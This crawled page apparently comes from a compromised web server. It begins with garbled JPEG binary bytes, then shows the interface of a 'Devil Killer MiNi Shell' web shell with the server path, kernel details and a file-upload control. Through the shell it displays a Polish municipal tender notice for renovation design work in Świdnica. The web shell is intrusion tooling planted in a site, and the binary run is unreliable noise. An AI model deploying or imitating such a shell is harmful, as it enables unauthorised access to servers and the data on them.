JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230718/0031165101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowo-kosztorysowej wraz z pełnieniem nadzoru autorskiego (...) pn.:<br/>„Rewitalizacja lokali mieszkalnych będących w zasobach Gminy Miasta Świdnicy” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Świdnica</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Prezydent Miasta Świdnicy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000579589</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej 49</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świdnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@um.swidnica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.um.swidnica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowo-kosztorysowej wraz z pełnieniem nadzoru autorskiego (...) pn.:<br/>„Rewitalizacja lokali mieszkalnych będących w zasobach Gminy Miasta Świdnicy” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2e45abde-253b-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00311651</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00044490/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.16 Usługi projektowe w ramach zadania pn.: &#34;Rewitalizacja lokali mieszkalnych będących w zasobach Gminy Miasta Świdnicy&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/um_swidnica <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Przedmiotowe postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy zakupowej OPEN NEXUS dostępnej pod adresem internetowym: https://platformazakupowa.pl/pn/um_swidnica.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Postępowanie prowadzone jest w języku polskim.<br/>2.	Postępowanie prowadzone jest w formie elektronicznej za pośrednictwem platformazakupowa.pl dalej: „Platforma”, pod adresem https://platformazakupowa.pl/pn/um_swidnica<br/>3.	Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej wskazanych w SWZ.<br/>4.	Funkcjonalność Platformy gwarantuje złożenie przez Wykonawcę w postępowaniu zaszyfrowanej oferty wraz z załącznikami, w sposób uniemożliwiający Zamawiającemu zapoznanie się z treścią oferty przed upływem terminu składania ofert.<br/>5.	W toku prowadzonego postępowania komunikacja między Wykonawcami a Zamawiającym, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane będą za pośrednictwem Platformy i formularza „Wyślij wiadomość do zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem Platformy poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego”, po których pojawi się komunikat, że wiadomość została wysłana do Zamawiającego.<br/>6.	Zamawiający będzie przekazywał Wykonawcom informacje w postaci elektronicznej za pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na Platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w postaci elektronicznej za pośrednictwem platformy do konkretnego Wykonawcy.<br/>7.	Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości przesłanych przez Zamawiającego bezpośrednio na Platformie, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>8.	Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452), określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na Platformie, tj.:<br/>8.1.	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>8.2.	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>8.3.	zainstalowana dowolna przeglądarka internetowa inna niż Internet Explorer, <br/>8.4.	włączona obsługa JavaScript, <br/>8.5.	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, <br/>8.6.	szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3., <br/>8.7.	oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>c.d. - informacje dodatkowe</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>	administratorem Pani/Pana danych osobowych jest Prezydent Miasta Świdnicy, <br/>ul. Armii Krajowej 49, 58-100 Świdnica tel. 74 856-28-00 fax 74 856-87-21, inspektorem ochrony danych osobowych w Gminie Miasto Świdnica kontakt: <br/>adres e-mail: iod@um.swidnica.pl , telefon 74 856-28-23*;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Opracowanie dokumentacji projektowo-kosztorysowej wraz z pełnieniem nadzoru autorskiego w ramach zadania inwestycyjnego pn.: „Rewitalizacja lokali mieszkalnych będących w zasobach Gminy Miasta Świdnicy”. P-82/VII/23 prowadzonym w trybie podstawowym bez negocjacji,<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy PZP,<br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy,<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP,<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO,<br/>	posiada Pani/Pan:<br/>•	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>•	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ,<br/>•	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ,<br/>•	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO,<br/>	nie przysługuje Pani/Panu:<br/>•	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">P-82/VII/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 75600 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest „Opracowanie dokumentacji projektowo-kosztorysowej wraz z pełnieniem nadzoru autorskiego w ramach zadania inwestycyjnego pn.: „Rewitalizacja lokali mieszkalnych będących w zasobach Gminy Miasta Świdnicy”, w tym:<br/><br/>Zadanie 1: „ Opracowanie dokumentacji projektowo-kosztorysowej przebudowy lokali mieszkalnych przy ulicy Garbarskiej 26/5 i Garbarskiej 26/6 oraz ulicy Długiej 20A/13”.<br/><br/>1.1.	Zakres prac projektowych obejmuje wykonanie kompletnej dokumentacji projektowo-kosztorysowej wraz z uzyskaniem niezbędnych uzgodnień, opinii, decyzji, w tym wszelkich decyzji administracyjnych umożliwiających realizacje robót budowlanych dla zadania polegającego na przebudowie lokali mieszkalnych będących w zasobach Gminy.<br/>1.2.	Czynny udział w postępowaniu na roboty budowlane wykonywane na podstawie zleconej niniejszym zamówieniem dokumentacji, poprzez udzielanie odpowiedzi na pytania Wykonawców dotyczące rozwiązań projektowych oraz aktualizacja kosztorysów na wezwanie Zamawiającego. <br/>1.3.	Sprawowanie Nadzoru Autorskiego. <br/><br/><br/>2.	Prace projektowe obejmują przebudowę następujących lokali mieszkalnych:<br/>2.1. Dla zadania 1: <br/>1)	Lokal w budynku przy ul. Garbarskiej 26/5 – powierzchnia lokalu 98,06 m2 - dokumentacja projektowa winna uwzględniać kompleksową przebudowę lokalu mieszkalnego w tym całkowitą wymianę stolarki okiennej wraz podokiennikami zewnętrznymi i wewnętrznymi oraz całkowitą wymianę stolarki drzwiowej, ewentualne wzmocnienie konstrukcji ścian i stropów, likwidację pieców kaflowych, wymianę instalacji: wodnej, kanalizacyjnej, gazowej i elektrycznej oraz C.O., roboty wykończeniowe w zakresie posadzek, roboty tynkarskie, malarskie, montaż grzejników oraz indywidualnych kotłów gazowych wraz z wykonaniem wentylacji (jeśli jest to technicznie możliwe, w przypadku braku takiej możliwości zaprojektowanie elektrycznego systemu ogrzewania), dostawa i montaż wyposażenia.<br/><br/>2)	Lokal w budynku przy ul. Garbarskiej 26/6 – powierzchnia lokalu 41,76 m2 - dokumentacja projektowa winna uwzględniać kompleksową przebudowę lokalu mieszkalnego wraz z adaptacją części poddasza, całkowitą wymianę stolarki okiennej wraz podokiennikami zewnętrznymi i wewnętrznymi oraz całkowitą wymianę stolarki drzwiowej, ewentualne wzmocnienie konstrukcji ścian i stropów, likwidację pieców kaflowych, wymianę instalacji: wodnej, kanalizacyjnej, gazowej i elektrycznej oraz C.O., roboty wykończeniowe w zakresie posadzek, roboty tynkarskie, malarskie, montaż grzejników oraz indywidualnych kotłów gazowych wraz z wykonaniem wentylacji (jeśli jest to technicznie możliwe, w przypadku braku takiej możliwości zaprojektowanie elektrycznego systemu ogrzewania), wydzielenie łazienki wraz z toaletą, dostawa i montaż wyposażenia. <br/><br/>3)	Lokal w budynku przy ul. Długiej 20A/13 – powierzchnia lokalu 70,10 m2 - dokumentacja projektowa winna uwzględniać kompleksową przebudowę lokalu mieszkalnego, całkowitą wymianę stolarki okiennej wraz podokiennikami zewnętrznymi i wewnętrznymi oraz całkowitą wymianę stolarki drzwiowej, ewentualne wzmocnienie konstrukcji ścian i stropów, likwidację pieców kaflowych, wymianę instalacji: wodnej, kanalizacyjnej, gazowej i elektrycznej oraz C.O., roboty wykończeniowe w zakresie posadzek, roboty tynkarskie, malarskie, montaż grzejników oraz indywidualnych kotłów gazowych wraz z wykonaniem wentylacji (jeśli jest to technicznie możliwe, w przypadku braku takiej możliwości zaprojektowanie elektrycznego systemu ogrzewania), wydzielenie łazienki wraz z toaletą (jeśli jest to technicznie możliwe – w przypadku braku takiej możliwości remont wraz z przebudową sanitariatów w części wspólnej), dostawa i montaż wyposażenia. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 35466,67 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta w specjalności konstrukcyjno-budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest „Opracowanie dokumentacji projektowo-kosztorysowej wraz z pełnieniem nadzoru autorskiego w ramach zadania inwestycyjnego pn.: „Rewitalizacja lokali mieszkalnych będących w zasobach Gminy Miasta Świdnicy”, w tym:<br/>Zadanie 2: „ Opracowanie dokumentacji projektowo-kosztorysowej przebudowy lokali mieszkalnych przy ulicy Drzymały 11a/17, 11a/18 i 11a/19 oraz ulicy Wodnej 4/7”.<br/><br/><br/>1.1.	Zakres prac projektowych obejmuje wykonanie kompletnej dokumentacji projektowo-kosztorysowej wraz z uzyskaniem niezbędnych uzgodnień, opinii, decyzji, w tym wszelkich decyzji administracyjnych umożliwiających realizacje robót budowlanych dla zadania polegającego na przebudowie lokali mieszkalnych będących w zasobach Gminy.<br/>1.2.	Czynny udział w postępowaniu na roboty budowlane wykonywane na podstawie zleconej niniejszym zamówieniem dokumentacji, poprzez udzielanie odpowiedzi na pytania Wykonawców dotyczące rozwiązań projektowych oraz aktualizacja kosztorysów na wezwanie Zamawiającego. <br/>1.3.	Sprawowanie Nadzoru Autorskiego. <br/><br/><br/>2.	Prace projektowe obejmują przebudowę następujących lokali mieszkalnych:<br/>Dla zadania 2: <br/>1)	Lokal w budynku przy pl. Drzymały 11a/17 – powierzchnia lokalu 39,28 m2 – dokumentacja projektowa winna uwzględniać kompleksową przebudowę lokalu mieszkalnego, całkowitą wymianę stolarki okiennej wraz podokiennikami zewnętrznymi i wewnętrznymi oraz całkowitą wymianę stolarki drzwiowej, ewentualne wzmocnienie konstrukcji ścian i stropów, likwidację pieców kaflowych, wymianę instalacji: wodnej, kanalizacyjnej, gazowej i elektrycznej oraz C.O., roboty wykończeniowe w zakresie posadzek, roboty tynkarskie, malarskie, montaż grzejników oraz indywidualnych kotłów gazowych wraz z wykonaniem wentylacji (jeśli jest to technicznie możliwe, w przypadku braku takiej możliwości zaprojektowanie elektrycznego systemu ogrzewania), wydzielenie łazienki wraz z toaletą, dostawa i montaż wyposażenia.<br/><br/>2)	Lokal w budynku przy pl. Drzymały 11a/18 – powierzchnia lokalu 40,64 m2 - dokumentacja projektowa winna uwzględniać kompleksową przebudowę lokalu mieszkalnego, całkowitą wymianę stolarki okiennej wraz podokiennikami zewnętrznymi i wewnętrznymi oraz całkowitą wymianę stolarki drzwiowej, ewentualne wzmocnienie konstrukcji ścian i stropów, likwidację pieców kaflowych, wymianę instalacji: wodnej, kanalizacyjnej, gazowej i elektrycznej oraz C.O., roboty wykończeniowe w zakresie posadzek, roboty tynkarskie, malarskie, montaż grzejników oraz indywidualnych kotłów gazowych wraz z wykonaniem wentylacji (jeśli jest to technicznie możliwe, w przypadku braku takiej możliwości zaprojektowanie elektrycznego systemu ogrzewania), dostawa i montaż wyposażenia.<br/><br/>3)	Lokal w budynku przy pl. Drzymały 11a/19 – powierzchnia lokalu 39,34 m2 – dokumentacja projektowa winna uwzględniać kompleksową przebudowę lokalu mieszkalnego, całkowitą wymianę stolarki okiennej wraz podokiennikami zewnętrznymi i wewnętrznymi oraz całkowitą wymianę stolarki drzwiowej, ewentualne wzmocnienie konstrukcji ścian i stropów, likwidację pieców kaflowych, wymianę instalacji: wodnej, kanalizacyjnej, gazowej i elektrycznej oraz C.O., roboty wykończeniowe w zakresie posadzek, roboty tynkarskie, malarskie, montaż grzejników oraz indywidualnych kotłów gazowych wraz z wykonaniem wentylacji (jeśli jest to technicznie możliwe, w przypadku braku takiej możliwości zaprojektowanie elektrycznego systemu ogrzewania), wydzielenie łazienki wraz z toaletą, dostawa i montaż wyposażenia.<br/><br/>4)	Lokal w budynku przy ul. Wodnej 4/7 – powierzchnia lokalu 47,04 m2 – dokumentacja projektowa winna uwzględniać kompleksową przebudowę lokalu mieszkalnego, całkowitą wymianę stolarki okiennej wraz podokiennikami zewnętrznymi i wewnętrznymi oraz całkowitą wymianę stolarki drzwiowej, ewentualne wzmocnienie konstrukcji ścian i stropów, likwidację pieców kaflowych, wymianę instalacji: wodnej, kanalizacyjnej, gazowej i elektrycznej oraz C.O., roboty wykończeniowe w zakresie posadzek, roboty tynkarskie, malarskie, montaż grzejników oraz indywidualnych kotłów gazowych wraz z wykonaniem wentylacji (jeśli jest to technicznie możliwe, w przypadku braku takiej możliwości zaprojektowanie elektrycznego systemu ogrzewania), dostawa i montaż wyposażenia. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 40133,33 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71248000-8 - Nadzór nad 